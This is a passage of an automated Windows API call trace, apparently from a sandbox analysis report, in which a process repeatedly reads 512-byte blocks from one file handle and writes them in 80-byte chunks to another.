(_FileHandle=4) returned 0x58 [0145.415] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] 
GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.416] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.416] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | 
out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.417] GetFileType (hFile=0x50) returned 0x1 [0145.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.417] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.417] GetFileType (hFile=0x50) returned 0x1 [0145.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.423] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, 
lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.424] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.424] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 
[0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.425] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) 
returned 1 [0145.425] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.425] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.426] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.426] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.426] GetFileType (hFile=0x50) returned 0x1 [0145.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, 
lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.427] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.427] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] GetFileType (hFile=0x50) returned 0x1 [0145.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.427] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.428] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.428] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, 
lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] GetFileType (hFile=0x50) returned 0x1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.428] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] GetFileType (hFile=0x50) returned 0x1 [0145.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] GetFileType (hFile=0x50) returned 0x1 [0145.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.429] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.429] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.429] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.429] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.429] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.429] GetFileType (hFile=0x50) returned 0x1 [0145.429] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, 
